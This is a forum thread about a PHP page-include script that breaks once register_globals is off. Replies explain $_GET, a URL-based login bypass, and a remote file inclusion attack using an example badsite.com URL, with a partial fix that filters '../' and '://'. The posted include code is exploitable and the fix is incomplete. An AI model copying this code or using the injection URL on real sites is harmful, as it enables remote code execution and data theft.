Global Variables not supported on my host

Jon7800

Hello,

We are switching to a new web host that does not support Global Variables. I understand this has been some what of a hot issue with the php community.

Anyways, i have an index page that has the following in it:

$ext = ".php";
$page = "".$page."".$ext."";
if (file_exists($page))
{
include($page);
} else {
include("splash.php");
}

I use the following URL to access pages:

http://www.mysite.com/index.php?page=mypage

With Globals turned off, this does not work anymore. Could someone please help me with how I should code my pages to make this method work again?

Thanks a lot in advance!

Jon

unreal128

To retrieve the page variable from http://www.mysite.com/index.php?page=mypage, use $_GET['page']. Global variables are inherently flawed because any person can usurp the variable values with their own. So for example, lets say you have a variable that determines if a user is logged in ($user_logged_in = 1). Any person can then type http://www.yoursite.com/index.php?user_logged_in=1 and viola, they now have user access.

drew010

just a little warning with that code...
$ext = ".php";
$page = "".$page."".$ext."";

the only thing wrong with that is what happens when they do index.php?page=http://badsite.com/script
then $page becomes http://badsite.com/script.php and your site will include that file.
i then write some bad php code to list all of your files, show their source code and perhaps even create my own files on your site, by either disabling php from parsing php pages on my server, or not having php installed. the stuff from my script gets sent back to you plain text and then your script executes the code.

the safe way to do that is like this..

$ext = '.php';
$page = '/home/yoursite/www/' . $_GET['page'] . $ext;

then the two things you should check for and warn the user about so they know you are watching them is to check to see if they have ../ in the page, or :// which would cover them trying http:// or https://

this is one of the most common exploits so you arent alone in it. most people learning php find it a nice shortcut but dont realize the power of include and how it can be used against you if the user is able to mess with it.